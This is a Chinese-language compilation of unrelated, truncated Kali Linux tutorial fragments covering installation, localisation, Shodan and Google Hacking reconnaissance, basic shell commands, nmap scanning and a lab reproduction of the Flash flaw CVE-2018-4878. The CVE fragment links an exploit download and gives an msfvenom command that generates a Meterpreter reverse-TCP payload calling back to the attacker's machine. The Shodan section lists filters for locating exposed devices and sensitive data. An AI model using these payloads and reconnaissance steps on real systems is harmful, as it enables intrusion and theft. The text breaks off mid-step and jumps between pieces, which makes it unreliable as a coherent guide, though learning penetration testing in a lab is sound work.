Kali Linux

首先在这里我真心希望病情早点散去，中国加油！ 一：kali-Linux介绍 Kali Linux 官网： https://www.kali.org/ Kali Linux 前身是著名渗透测试系统BackTrack ，是一个基于 Debian 的 Linux 发行版，包含很多安全和取证方面的相关工具。 Kali Linux 是一款非常不错的渗透测试系统，致力于做最优秀的渗透测试分发系统。 社区支持： https://www.kali.org/community/ 社区BBS论坛: http://forums.kali.org/ 开源Bug追踪系统： https://tools.kali.org/ Kali Linux 仓库： http://git.kali.org/gitweb/ Kali Linux Bug上报中心： https://bugs.kali.org/my_view_page.php 数据库溢出学习库： https://www.exploit-db.com/ 此漏洞类别包括远程服务或应用程序的漏洞，包括客户端漏洞攻击。 二：Kali-2020.1版本安装（以下操作均属本人实践） //由于只是测试使用，安装过程简单，大部分是默认安装。 第一步：这里我们通过虚拟机安装，创建过程省略.......，设备配置根据自己机器性能。 第二步：开启虚拟机，开始安装，选择Graphical

##一、下载打开Kali ###1.下载kali 下载链接 （无法使用可以去 Kali官网 进行下载） 点击链接进入官网后，点击 Torrent 按钮下载Torrent文件，之后在迅雷中打开此文件，在下载选项框中选择 kali-linux-2020.1-vmware-amd64.7z 文件下载 ###2.打开Kali 下载 kali-linux-2020.1-vmware-amd64.7z 文件之后，我们将该文件解压一个自己比较容易找到的路径，会得到下图所示的文件列表 打开VMware Workstation,点击 打开虚拟机 找到自己之前解压文件的路径之后，打开截图所示的文件，然后点击 开启此虚拟机 有的同学之前使用其他复制的虚拟机的时候应该也知道了，点击 我已复制该虚拟机 进入登录界面，默认的用户名和密码都是kali（小写字母），输入即可进入系统界面了 ##二、Kali的汉化 ###1.中文乱码的解决 为了防止我们在把语言设置为中文之后出现乱码，我们需要先更新源 使用 sudo -s 并输入密码kali获得管理员权限 使用 vim /etc/apt/sources.list 打开sources.list文件，然后在文件尾部加入更新源，保存并退出 deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main

整理笔记，把以前印象笔记中记录的一些东西翻出来，想想发个随笔吧。 第一步在官网下载kali linux的镜像。 网址： https://www.kali.org/downloads/ (我的电脑是64位的，所以我选择下载第一个，如果机子是32位的，推荐下载第二个！） 第二步是创建新的虚拟机。 首先，打开虚拟机主页，点击“创建新的虚拟机” 弹出新建虚拟机向导框后，点击“稍后安装操作系统” 之后点击“下一步”，会出现如图所示界面 选择ubuntu，因为ubuntu和kali都是debian的linux发行版。 安装路径和名称不要出现中文 使用空间较大的盘，单独创建虚拟机文件夹，路径为英文。 点击下一步，直到出现. 如果有足够空间的话，分两个g内存。 磁盘大小可选择30，40. 点击“下一步”，将你的虚拟机存盘即可，直到出现如图所示的界面。 点击自定义硬件， 点击左侧新CD/DVD,在右侧选中使用ISO映像文件，浏览，找到并选择之前已经下载好的kali的iso文件。 点击关闭。点击“确定”，在之后的页面上，点击开启此虚拟机 使用上下方向键，选择“图形化安装”。 下面就是选择你的地区和系统语言，安装kali时，选择英文安装，因为在后期的使用和软件安装过程中，中文路径问题会导致一些安装失败的现象，这里使用中文进行演示，安装时可对应英文，系统语言选择“中文简体”即可。直到会出现如下所示的界面。

搜索引擎： 公司新闻动态，重要雇员信息 机密文档/网络拓扑 用户名密码 目标系统软硬件技术架构 Shodan：搜索联网的设备（iot）https://www.shodan.io/ banner：http，ftp，telnet，ssh 常见语法： net：搜索指定的IP地址或子网（192.168.1.1 192.168.2.0/24） country：搜索指定的国家（CN，US，JP） city：搜索指定的城市（beijing，kunming） port：搜索指定的端口（22，80，53，3306） OS：搜索指定的操作系统（windows，linux，） hostname：搜索指定的主机或域名（baidu.com，223.5.5.6） org：搜索指定的组织或公司（baidu，google） isp：搜索指定的ISP供应商（china telecom） version：搜索指定的软件版本（7.0） server：搜索服务类型（apache，tomcat，nginx，iis，mysql.....） 实例： 搜索位于中国，北京的linux设备，而且端口是22 搜索状态码为200 OK 且位于日本的huawei设备 —————————————————————————————————————————————————————————————————————— Google Hacking

1、漏洞概述 2018年2月1号，Adobe官方发布安全通报（APSA18-01），声明Adobe Flash 28.0.0.137及其之前的版本，存在高危漏洞（CVE-2018-4878）。 攻击者通过构造特殊的Flash链接，当用户用浏览器/邮件/Office访问此Flash链接时，会被“远程代码执行”，并且直接被getshell。 2、实验环境 攻击机：kali 2017 + exp：cve-2018-4878.py 攻击机IP：192.168.190.130 靶机：Windows 7 + flash：flashplayer_activex_28.0.0.137.exe 靶机IP：192.168.190.131 3、实验利用工具 链接: https://pan.baidu.com/s/1nnUCy8xPbcIgT24ddo6D1A 密码: e292 4、漏洞复现 将网盘中的CVE-2018-4878-master目录下载下来，并放入kali linux 桌面 使用msfvenom生成shell代码 生成代码，其中lhost为kali的ip地址，lport为自定义的端口号 root@kali: ~# msfvenom -p windows/meterpreter/reverse_tcp lhost= 192.168 . 190.130 lport= 8888 -f python

解决虚拟机中kali linux系统不能与物理机之间复制粘贴的问题 参考文章： （1）解决虚拟机中kali linux系统不能与物理机之间复制粘贴的问题 （2）https://www.cnblogs.com/lyt-666/p/11170437.html 备忘一下。 来源： oschina 链接： https://my.oschina.net/u/4438370/blog/4794234

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 一、课程背景 相较通过图形界面执行计算机命令，使用命令行模式执行相应操作，能够更好地节约计算机资源，迅速提升计算机运行效力。Kali Linux命令如同中文的拼音，英文的单词，虽然学习过程可能繁杂枯燥，但它是一切学习的基础，是决定最终学习高度的基石。无论今后是否进入计算机领域工作，熟练掌握Linux相关命令，都将有助于提升您的工作效率、工资薪金。 二、课前准备 操作机的VMware虚拟机中，Kali Linux程序安装完毕。 三、课程目标 通过学习本课程，能够熟练掌握并使用alias命令。 四、课程内容 1.alias命令的作用 用于设置命令的别名，即可按照自己的记忆和使用习惯，自定义属于自己的命令名。但须注意，使用alias命令设置的命令别名只是临时生效，即该别名只能在设置终端界面生效，如新建一个终端界面，该命令别名将失效。 2.alias命令语法详解 命令行：alias [自定义的命令别名]=[指令名称] 3.命令使用实例

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 一、课程背景 相较通过图形界面执行计算机命令，使用命令行模式执行相应操作，能够更好地节约计算机资源，迅速提升计算机运行效力。Kali Linux命令如同中文的拼音，英文的单词，虽然学习过程可能繁杂枯燥，但它是一切学习的基础，是决定最终学习高度的基石。无论今后是否进入计算机领域工作，熟练掌握Linux相关命令，都将有助于提升您的工作效率、工资薪金。 二、课前准备 操作机的VMware虚拟机中，Kali Linux程序安装完毕。 三、课程目标 通过学习本课程，能够熟练掌握并使用cat命令。 四、课程内容 1.cat命令的作用 显示文件内容。 2.cat命令语法详解 命令行：cat [选项] [文件名] 其中：[选项]参数有 n：由 1 开始对所输出所有内容，包括空行进行行数编号。 b：由1开始对所输出内容进行行数编号，但空行仅做显示不进行行数编号。 3.命令使用实例 显示/etc/issue文件内容。 命令行：cat /etc/issue 运行结果： 显示文件内容并对其所有内容，包括空行进行行数编号。 命令行：cat -n demo.list 运行结果： 显示文件内容并对其内容进行行数编号

　　一、安装 vmware 及 windows 　　0、VM 虚拟机就是模拟多个物理机系统（硬件、系统） 　　1、可能大家是 win10（操作系统版本比较高，会提示安装微软 XXx 什么补丁，自己根据提示下载补丁或者自动让他自动更新下载），记得一定要重新启动操作才能安装。 　　2、VM 安装完之后，一定记得看一下物理机的网络是否存在 vmnet1 各 vmnet8（注意不能有 Npcap loopback adapter 开头的网卡，有的话一定要禁用，不然 VM 不能上网或不能获取 IP 地址） 　　3、VMware 安装完之后，安装系统的时候有些人提示 XXx 二进制、什么虚拟化没有开启，可以参考： https://jingyan.baidu.com/article/ab0b56305f2882c15afa7dda.html 　　4、很多人使用是 win10 家庭版操作系统，安装 VM 的时候使用的是普通用户权限或者当前系统帐号是加入到了管理员组，那么这种权限后期很容易出一些奇怪的问题，解决方法（直接选定文件右击管理员运行或者使用https://zhidao.baidu.com/question/1770470425016392380.html） 　　5、把一个帐号加入到管理员组 net localgroup administrators UserName/add 　　6、新建

课前声明： 1、本分享仅做学习交流，请自觉遵守法律法规！ 2、搜索：Kali 与编程，学习更多网络***干货！ 3、Kali 与编程每天准时更新，敬请学习和关注！ 正文部分 一、背景介绍 nmap是一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统（这是亦称 fingerprinting）。它是网络管理员必用的软件之一，以及用以评估网络系统安全。 通常我们在进行***测试的过程中需要对目标主机的端口开放状态进行探测，从而了解目标主机，进行对应的测试。 二、资源装备 1.安装好 Win7的虚拟机一台 2.整装待发的小白一个。 3.安装好的Kali Linux虚拟机一台。 三、战略安排 3.1 nmap帮助信息查询，如下图所示。 命令：nmap --help 3.2 nmap扫描主机信息，如下图所示。 命令：nmap IP 例子：nmap 192.168.0.100 3.3 nmap扫描服务版本信息，如下图所示。 命令：nmap -sV IP 例子：nmap -sV 192.168.0.100 3.4 nmap扫描文件中的ip列表，如下图所示。 命令：nmap -iL IP.txt 例子：nmap -iL ip.txt 3.5 扫描一定IP范围内的主机，如下图所示。 命令：nmap IP段 例子：nmap 192